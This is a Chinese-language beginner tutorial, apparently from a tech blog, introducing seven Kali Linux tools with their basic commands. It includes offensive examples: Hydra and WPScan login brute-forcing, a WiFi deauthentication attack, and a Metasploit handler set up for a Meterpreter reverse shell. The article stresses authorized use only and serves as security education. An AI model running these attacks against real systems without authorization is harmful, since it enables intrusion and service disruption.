Kali Linux 预装多种安全工具。本文介绍 Nmap、Lynis、WPScan、Aircrack-ng、Hydra、Wireshark 及 Metasploit Framework 等核心工具的功能与基本用法。涵盖端口扫描、系统审计、CMS 漏洞检测、无线安全评估、密码破解、流量分析及漏洞利用框架。适合网络安全入门者了解基础工具链。
Kali Linux 是专为数字取证和渗透测试设计的 Debian Linux 发行版。它预装了数百种安全工具,涵盖了从信息收集、漏洞扫描到权限提升的整个攻击生命周期。对于网络安全从业者而言,熟练掌握这些核心工具是基础技能之一。本文将详细介绍其中七款最常用的工具及其基本用法、命令参数及适用场景。
Nmap(Network Mapper,网络映射器)是全球最受欢迎的开源网络扫描工具。它是进行网络资产发现和信息收集的首选工具。
# 快速扫描目标 IP
nmap -T4 192.168.1.1
# 探测服务版本并尝试操作系统识别
nmap -sV -O 192.168.1.1
# 扫描所有端口(较慢)
nmap -p- 192.168.1.1
# 使用 NSE 脚本扫描特定漏洞
nmap --script vuln 192.168.1.1
适用于网络拓扑梳理、开放端口排查、防火墙策略验证以及初步的信息收集阶段。
Lynis 是一个强大的系统安全审计工具,旨在帮助管理员评估系统的安全性和合规性。
# 本地系统审计
lynis audit system
# 生成审计报告
lynis audit system --audit-profile webserver
# 静默模式运行
lynis audit system --quiet
常用于服务器上线前的安全检查、定期合规审计以及系统加固后的效果验证。
WPScan 是针对 WordPress CMS 的专业安全审计工具。WordPress 是全球最流行的内容管理系统,因此其安全性备受关注。
# 扫描指定 URL 的用户名
wpscan --url http://example.com --enumerate u
# 扫描插件和主题版本
wpscan --url http://example.com --enumerate p,t
# 暴力破解登录密码
wpscan --url http://example.com --usernames admin --passwords passwords.txt
WPScan 主要用于授权测试。未经授权对他人网站进行扫描或爆破属于违法行为。
适用于 WordPress 站点的安全评估、插件漏洞排查以及 CMS 安全加固。
Aircrack-ng 是一套完整的无线网络安全评估套件,用于监控、攻击、测试和破解 WiFi 网络。
# 启动网卡监听模式
airmon-ng start wlan0
# 扫描附近的 WiFi 网络
airodump-ng wlan0mon
# 发送解除认证包(仅用于自有网络测试)
aireplay-ng --deauth 10 -a [AP_MAC] wlan0mon
# 抓包并保存
airodump-ng -w capture wlan0mon
适用于无线网络安全评估、信号强度测试、密码恢复(仅限拥有合法权限的网络)。注意:部分操作可能干扰正常通信,需谨慎使用。
Hydra 是一款快速的在线密码暴力破解工具,支持多种网络协议。
# SSH 协议暴力破解
hydra -l user -P password.txt ssh://192.168.1.1
# FTP 协议暴力破解
hydra -L users.txt -P pass.txt ftp://192.168.1.1
# HTTP POST 登录表单破解
hydra -l admin -P pass.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F"
主要用于弱口令检测、权限验证测试。在实际渗透测试中,通常配合其他工具使用以获取初始访问权限。
Wireshark 是全球广泛使用的网络协议分析器,被誉为网络故障排查的'瑞士军刀'。
# 命令行抓包并保存
tcpdump -i eth0 -w capture.pcap
# 使用过滤器查看 HTTP 流量
wireshark -f "http and ip.addr == 192.168.1.1"
适用于网络通信调试、恶意流量分析、协议逆向研究以及网络性能优化。
Metasploit 是目前世界上最著名的渗透测试框架,提供了丰富的漏洞利用模块和后渗透工具。
# 启动控制台
msfconsole
# 搜索漏洞模块
search exploit/windows/smb/ms17_010
# 设置目标 IP 和 Payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run
适用于漏洞验证、红队演练、权限提升测试以及自动化渗透流程构建。
上述工具构成了 Kali Linux 的核心能力圈。掌握它们的基本用法是进入网络安全领域的第一步。然而,技术本身是中性的,使用这些工具必须严格遵守法律法规,仅在获得明确授权的范围内进行测试。未经授权的攻击行为不仅违法,还可能对个人和社会造成严重危害。建议结合官方文档持续学习,并在合法的靶场环境中练习。
注:本文内容仅供技术交流与学习参考,请勿用于非法用途。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online